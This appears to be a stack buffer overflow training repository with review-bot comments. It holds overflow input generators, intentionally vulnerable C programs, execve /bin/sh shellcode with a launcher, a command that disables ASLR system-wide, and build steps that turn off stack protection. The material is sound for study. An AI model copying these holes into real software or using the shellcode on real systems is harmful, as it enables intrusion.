#!/usr/bin/env python
from struct import *
buf = ""
# last version: buf += "A"*400
buf += "A"*104
buf += pack("<Q", 0x424242424242)
buf+="C"*200
f = open("in.txt", "w")
f.write(buf)
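Review bot: `buf` starts as a text string (`buf = ""`) but `pack("<Q", ...)` returns `bytes` on Python 3, so `buf += pack(...)` raises `TypeError` there; with the unversioned `#!/usr/bin/env python` shebang the script only runs where `python` is still Python 2. Keeping the whole buffer as bytes and writing in binary mode fixes this: `buf = b""`, `b"A"*104`, `b"C"*200`, and `with open("in.txt", "wb") as f: f.write(buf)`, which also closes the file handle that is currently left open. `from struct import *` can be narrowed to `from struct import pack`. The empty template script that follows and the pwntools variant further down share the same str/open pattern.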
#!/usr/bin/env python
from struct import *
buf = ""
# Your code goes here
f = open("in.txt", "w")
f.write(buf)
/*
* I'm not the author of this code, and I'm not sure who is.
* There are several variants floating around on the Internet,
* but this is the one I use.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char *ptr;
if(argc < 3) {
printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]); /* get env var location */
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
printf("%s will be at %p\n", argv[1], ptr);
}
\ No newline at end of file
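Review bot: `getenv(argv[1])` returns NULL when the variable is not set, and the next line does pointer arithmetic on that NULL and prints the result as if it were a valid location. A guard right after the call, `if (ptr == NULL) { fprintf(stderr, "%s is not set\n", argv[1]); return 1; }`, makes that case explicit. The usage branch also exits with status 0 although the invocation was malformed, and `main` has no `return` on the normal path; `exit(1)` there and a final `return 0;` would make the exit status meaningful.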
# include <stdio.h>
# include <stdlib.h>
# include <string.h>
int main (int argc, char *argv[])
{
char buffer[1928];
if (argc == 2) {
strcpy(buffer,argv[1]);
printf("%s",buffer);
printf("\n");
}
else{
printf("Enter one command line argument");
}
return 0;
}
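Review bot: `strcpy(buffer,argv[1])` copies an argument of unchecked length into the 1928-byte `buffer`, and nothing in the file says whether that is intended. If this is a deliberately vulnerable exercise target, as the neighbouring files suggest, a header comment should say so, e.g. `/* Intentionally vulnerable training target: unbounded strcpy into a stack buffer. Do not reuse. */`, so the file is not copied elsewhere or triaged as an accidental bug. For reference, the bounded form is `snprintf(buffer, sizeof buffer, "%s", argv[1]);`. The usage message in the `else` branch is printed without a trailing newline.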
#!/usr/bin/env python
from pwn import *
buf = ""
last version: buf += "A"*400
buf+= cyclic(200)
f = open("in.txt", "w")
f.write(buf)
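Review bot: The line `last version: buf += "A"*400` has lost its leading `#`, so the file does not parse and stops with a `SyntaxError` before anything is written. Restore it as a comment, `# last version: buf += "A"*400`, or delete it. `from pwn import *` pulls a large namespace into a script that only uses `cyclic`; `from pwn import cyclic` states the dependency explicitly.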
/* Source: https://movaxbx.ru/2018/02/16/64-bit-linux-stack-smashing-tutorial-part-1/
/* Compile: gcc -fno-stack-protector -z execstack vuln.c -o vuln*/
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space */
#include <stdio.h>
#include <unistd.h>
int vuln() {
char buf[80];
int r;
r = read(0, buf, 400);
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}
int main(int argc, char *argv[]) {
printf("Try to exec /bin/sh");
vuln();
return 0;
}
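Review bot: The header tells the reader to run `echo 0 > /proc/sys/kernel/randomize_va_space`, which turns ASLR off for every process on the host and stays in effect until the value is written back; `setarch "$(uname -m)" -R ./vuln` limits the change to the one process under study. The first comment line opens with `/*` and is never closed on that line, so it only ends at the `*/` of the Compile line and gcc's `-Wcomment` flags the nested `/*`; add ` */` at the end of the Source line. In `vuln()`, `read(0, buf, 400)` into `char buf[80]` and the `%s` print of an unterminated buffer are presumably the point of the exercise, and a one-line comment saying so would keep the file from being read as an ordinary bug.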
; execve("/bin//sh", 0, 0) for linux/x86-64
section .text
global _start
_start:
push rax ; rax on stack
xor rdx, rdx ; rdx= NULL
xor rsi, rsi ; rsi=NULL
mov rbx,'/bin//sh' ;rbx="bin//sh"
push rbx ; first on stack
push rsp ; second on stack
pop rdi ; rdi="/bin//sh",0
mov al, 59
syscall
\ No newline at end of file
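Review bot: The comment on the `mov rbx,'/bin//sh'` line reads `rbx="bin//sh"`, dropping the leading slash that the operand has; it should read `; rbx = "/bin//sh"`. The `push rax ; rax on stack` comment only restates the instruction; a comment stating what value the code expects in `rax` at entry would document the assumption the following lines depend on.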
#include <stdlib.h>
#include <unistd.h>
void main (int argc, char ** argv){
char *name[2];
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0], &name[0], &name[1]);
exit(0);
}
\ No newline at end of file
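Review bot: `execve` only returns when it fails, and the code then calls `exit(0)`, reporting success for a failed exec. Replace that line with `perror("execve"); exit(1);` (with `#include <stdio.h>` added) so the failure is visible to the caller. `void main` is also non-standard; `int main(int argc, char **argv)` is the portable signature.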
#include <stdio.h>
//TODO insert here shellcode
unsigned char shellcode[] = "";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
\ No newline at end of file
### Explore Shell code creation x64
Source: https://www.exploit-db.com/shellcodes/42179
* Install nasm
sudo apt install nasm
* Compile assembler code sh.s with nasm
nasm -f elf64 sh.s -o sh.o
* Link file to executeable
ld sh.o -o sh
* Test `./sh`
* Extract shell code from objdump in .text section
objdump -d sh
Your shellcode is:
/x50/x48/...
* Verify your shell code with text.c file
1. Insert your extracted shellcode
2. Compile
gcc -fno-stack-protector -z execstack test.c -o test
3. Run `./test`
\ No newline at end of file